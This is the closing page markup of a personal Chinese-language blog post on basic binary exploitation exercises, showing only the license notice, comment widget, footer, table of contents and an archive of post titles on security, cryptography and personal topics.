</ol>

    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>原文作者：<a href="https://daddyhonggg.github.io">OtterV</a>
            <p>原文链接：<a href="https://daddyhonggg.github.io/2019/07/08/20190708pwn1/">https://daddyhonggg.github.io/2019/07/08/20190708pwn1/</a>
            <p>发表日期：<a href="https://daddyhonggg.github.io/2019/07/08/20190708pwn1/">July 8th 2019, 8:03:08 pm</a>
            <p>更新日期：<a href="https://daddyhonggg.github.io/2019/07/08/20190708pwn1/">October 9th 2019, 7:17:25 pm</a>
            <p>版权声明：本文采用<a rel="license" href="http://creativecommons.org/licenses/by-nc/4.0/">知识共享署名-非商业性使用 4.0 国际许可协议</a>进行许可</p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2019/11/12/20191112vmp/" title= "虚拟化保护 VMP">
                    <div class="nextTitle">虚拟化保护 VMP</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2019/06/03/20190603ccpcgirlsnj/" title= "2019CCPC女生赛南京之行">
                    <div class="prevTitle">2019CCPC女生赛南京之行</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    
    <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
    <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
    <div id="comment"></div>
    <script>
    new Valine({
        el: '#comment' ,
        notify:false, 
        verify:false, 
        appId: "nNBXAkxhHnRSmyrTGkGqWol2-gzGzoHsz",
        appKey: "8ORVnQBXp9DfAFfPTmEWk4OI",
        placeholder: "<(` o ')/\(' ^ `)>",
        path:window.location.pathname, 
        avatar:'mm' 
    });
    </script>


    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:daddy_hong@foxmail.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/daddyhonggg" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#Such-over（overInt）"><span class="toc-number">1.</span> <span class="toc-text">Such_over（overInt）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#how-do-with-one（whichRepeater）"><span class="toc-number">2.</span> <span class="toc-text">how_do_with_one（whichRepeater）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#what-stack（over）"><span class="toc-number">3.</span> <span class="toc-text">what_stack（over）</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 20
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 9101 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/30</span><a class="archive-post-title" href= "/9101/11/30/91020000xxxg/" >XX相关</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/12</span><a class="archive-post-title" href= "/2019/11/12/20191112vmp/" >虚拟化保护 VMP</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">07/08</span><a class="archive-post-title" href= "/2019/07/08/20190708pwn1/" >Pwn训练1 —— 基本的漏洞利用（栈溢出、整数溢出、oﬀ by one）</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">06/03</span><a class="archive-post-title" href= "/2019/06/03/20190603ccpcgirlsnj/" >2019CCPC女生赛南京之行</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">03/25</span><a class="archive-post-title" href= "/2019/03/25/20190325ttdybxmy/" >谈谈最近看的电影——波希米亚狂想曲</a>
        </li>
    
    
    
    
    
        </ul>
    
    <div class="archive-year"> 2018 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/25</span><a class="archive-post-title" href= "/2018/12/25/20181225cryptosmallthings/" >密码学小记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">12/12</span><a class="archive-post-title" href= "/2018/12/12/20181212RSAs/" >RSA___Rivest&Shamir&Adleman</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/06</span><a class="archive-post-title" href= "/2018/11/06/2018rop/" >ROP_lev</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">11/06</span><a class="archive-post-title" href= "/2018/11/06/2018reverse/" >逆向题目WriteUPs</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/23</span><a class="archive-post-title" href= "/2018/10/23/20181023tpv/" >欲望，道德与逃离</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/23</span><a class="archive-post-title" href= "/2018/10/23/20181022zyc/" >栈溢出漏洞及其利用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/21</span><a class="archive-post-title" href= "/2018/10/21/20181021wmm/" >Salty</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">10/10</span><a class="archive-post-title" href= "/2018/10/10/20181010Vigenere/" >Vigenere破解</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/12</span><a class="archive-post-title" href= "/2018/09/12/20180912bcdtts/" >Ubuntu Linux 虚拟机 + IDA 动态调试 Welcome</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/10</span><a class="archive-post-title" href= "/2018/09/10/20180910bsb/" >Binary security 基础</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/06</span><a class="archive-post-title" href= "/2018/09/06/20180906cpuse/" >About Computer Easy Using</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/18</span><a class="archive-post-title" href= "/2018/08/18/20180818tz/" >亲爱的泰呆呆：</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/14</span><a class="archive-post-title" href= "/2018/08/14/20180814fzcp/" >肥宅的快乐-维他测评</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/12</span><a class="archive-post-title" href= "/2018/08/12/20180812start/" >BLOG:DADDY_HONG‘s の start</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/08</span><a class="archive-post-title" href= "/2018/04/08/201804gets/" >关于gets()的危险（不安全）性</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="Blog"><span class="iconfont-archer">&#xe606;</span>Blog</span>
    
        <span class="sidebar-tag-name" data-tags="for"><span class="iconfont-archer">&#xe606;</span>for</span>
    
        <span class="sidebar-tag-name" data-tags="computer"><span class="iconfont-archer">&#xe606;</span>computer</span>
    
        <span class="sidebar-tag-name" data-tags="EAT"><span class="iconfont-archer">&#xe606;</span>EAT</span>
    
        <span class="sidebar-tag-name" data-tags="Binary Security"><span class="iconfont-archer">&#xe606;</span>Binary Security</span>
    
        <span class="sidebar-tag-name" data-tags="Reverse"><span class="iconfont-archer">&#xe606;</span>Reverse</span>
    
        <span class="sidebar-tag-name" data-tags="Reading"><span class="iconfont-archer">&#xe606;</span>Reading</span>
    
        <span class="sidebar-tag-name" data-tags="Movie"><span class="iconfont-archer">&#xe606;</span>Movie</span>
    
        <span class="sidebar-tag-name" data-tags="Pwn"><span class="iconfont-archer">&#xe606;</span>Pwn</span>
    
        <span class="sidebar-tag-name" data-tags="Cryptography"><span class="iconfont-archer">&#xe606;</span>Cryptography</span>
    
        <span class="sidebar-tag-name" data-tags="Programming"><span class="iconfont-archer">&#xe606;</span>Programming</span>
    
        <span class="sidebar-tag-name" data-tags="ACM"><span class="iconfont-archer">&#xe606;</span>ACM</span>
    
        <span class="sidebar-tag-name" data-tags="C"><span class="iconfont-archer">&#xe606;</span>C</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "OtterV"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script><!-- hexo-inject:begin --><!-- hexo-inject:end -->    
     
    </body>
</html>


